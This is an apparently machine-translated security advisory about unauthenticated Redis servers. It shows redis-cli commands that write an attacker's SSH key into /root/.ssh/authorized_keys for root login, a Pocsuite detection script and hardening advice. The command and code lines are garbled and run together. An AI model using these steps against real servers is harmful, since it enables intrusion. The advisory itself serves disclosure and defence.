Shulou(Shulou.com)06/01 Report--

Preface

Redis is an open source API that is written in ANSI C language, supports the network, can be memory-based and persistent, and provides API in multiple languages.

The problem of unauthorized access to Redis has always been a problem. We know that Chuangyu Security Research team has also done relevant emergencies in the history. Today, there is another situation in which Redis unauthorized access and SSH key files are used, resulting in a large number of Redis servers being hacked. Today, let's briefly analyze.

I. Overview of loopholes

By default, Redis will bind to 0.0.0.0Redis 6379, which will expose the Redis service to the public network. If authentication is not enabled, it can cause any user to access Redis and read Redis data without authorization if he can access the target server. Without authorized access to Redis, an attacker can use the relevant methods of Redis to successfully write a public key on the Redis server, and then log in to the target server directly using the corresponding private key.

1. Vulnerability description

The concept of the Redis security model is: "Please do not expose Redis to the public network, because it is very dangerous to expose untrusted customers to Redis."

The reason why the Redis author gives up solving the insecurity caused by unauthorized access is that 99.99% of the scenarios that use Redis are in a sandboxed environment, adding security rules and complexity for the sake of 0.01% probability. Although this problem is not insurmountable, it is still not cost-effective in his design philosophy.

Because other trusted users need to use Redis or because of the negligence of the operation and maintenance staff, some Redis is bound to 0.0.0.0Redis 6379 and authentication is not enabled (this is the default configuration of Redis). If relevant policies are not adopted, such as adding firewall rules to avoid ip access from other untrusted sources, the Redis service will be directly exposed on the public network. As a result, other users can directly access the Redis service and perform related operations without authorization.

Using the config command provided by Redis itself, the file can be written, and the attacker can successfully write his public key to the authotrized_keys file of the / root/.ssh folder of the target server, and then log in to the target server directly with the corresponding private key.

2. Impact of vulnerabilities

Redis is exposed on the public network (i.e. bound at 0.0.0.0 6379, and the target IP is accessible to the public network), and can be exploited because it is not authenticated and relevant security policies are not added.

Search results through ZoomEye show that there are 97707 Redis services that can be accessed directly on the public network.

According to the ZoomEye probe, the distribution of Redis that can be directly utilized by global non-authentication is as follows:

No global verification can directly take advantage of Redis TOP 10 countries and territories:

3. Loophole analysis and utilization

First, produce the public and private key files locally:

$ssh-keygen-t rsa

Then write the public key to the foo.txt file

$(echo-e "\ n\ n"; cat id_rsa.pub; echo-e "\ n\ n") > foo.txt

Reconnect the Redis to write to the file

$cat foo.txt | redis-cli-h 192.168.1.11-x set crackit$ redis-cli-h 192.168.1.11 > config set dir / root/.ssh/OK$ 192.168.1.11 set crackit$ redis-cli 6379 > config get dir1) "dir" 2) "/ root/.ssh" $192.168.1.116379 > config set dbfilename "authorized_keys" OK$ 192.168.1.116379 > saveOK

In this way, you can successfully write your public key to the authotrized_keys file in the / root/.ssh folder, and then the attacker directly executes:

$ssh-I id_rsa root@192.168.1.11

You can log in to the server remotely using your private key.

Of course, the directory you write is not limited to authorized_keys under / root/.ssh, but you can also write to the user directory, but many Redis runs with root permissions, so you can skip the step of guessing users when writing to the root directory.

4. Other hazards and uses of Redis without authorization.

A) Database data leakage

Redis, as a database, stores all kinds of data. If there is unauthorized access, it will lead to data leakage, including saved user information and so on.

B) Code execution

The characteristic that Redis can nest Lua scripts will lead to code execution, which will harm the code execution of other servers. Examples are as follows: once an attacker can execute arbitrary code on the server side, the attack mode will become more and more complex, which is very dangerous.

Through Lua code attackers can call the redis.sha1hex () function to maliciously exploit the Redis server for SHA-1 cracking.

C) Disclosure of sensitive information

Through the INFO command of Redis, you can view server-related parameters and sensitive information, laying the groundwork for the subsequent penetration of attackers.

You can see that a lot of Redis server information has been leaked, such as the current Redis version, memory running status, the number of servers and other sensitive information.

5. Vulnerability verification

You can use Pocsuite (http://github.com/knownsec/pocsuite) to execute the following code that can be used to test whether an unauthorized Redis service exists at the target address.

#! / usr/bin/env python#-*-coding:utf-8-*-import socketimport urlparsefrom pocsuite.poc import POCBase Outputfrom pocsuite.utils import register class TestPOC (POCBase): vulID = '89339' version =' 1' author = ['Anonymous'] vulDate =' 2015-10-26' createDate = '2015-10-26' updateDate =' 2015-10-26' references = ['http://sebug.net/vuldb/ssvid-89339'] name =' Redis unauthorized access PoC' appPowerLink = 'http://redis.io/' appName =' Redis' appVersion = 'All' vulType =' Unauthorized access' desc =' Redis can be accessed without a password by default Hackers can access all the information in the database directly, resulting in serious information leakage. '' samples = ['] def _ verify (self): result = {} payload ='\ x2a\ x31\ x0d\ x0a\ x24\ x34\ x0d\ x0a\ x69\ x6e\ x66\ x6f\ x0d\ x0as = socket.socket () socket.setdefaulttimeout (10) try: host = urlparse.urlparse (self.url). Netloc port = 6379 s.connect ((host) Port) s.send (payload) recvdata = s.recv (1024) if recvdata and 'redis_version' in recvdata: result [' VerifyInfo'] = {} result ['VerifyInfo'] [' URL'] = self.url result ['VerifyInfo'] [' Port'] = port except: pass s.close () return self.parse_attack (result) def _ attack (self): return self._verify () def parse_attack (self) Result): output = Output (self) if result: output.success (result) else: output.fail ('Internet nothing returned') return output register (TestPOC)

II. Safety recommendations

Configure the bind option, limit the IP that can connect to the Redis server, and modify the default port 6379 of the Redis

Configure authentication, that is, AUTH, set the password, which will be saved in clear text in the Redis configuration file

Configure the rename-command configuration item "RENAME_CONFIG" so that even if there is unauthorized access, it can make it more difficult for an attacker to use config instructions

The good news is that the Redis author said that "real user" will be developed to distinguish between ordinary users and admin permissions, and ordinary users will be prohibited from running certain commands, such as config.

Summary

The above is the whole content of this article, I hope that the content of this article has a certain reference and learning value for your study or work, if you have any questions, you can leave a message and exchange, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.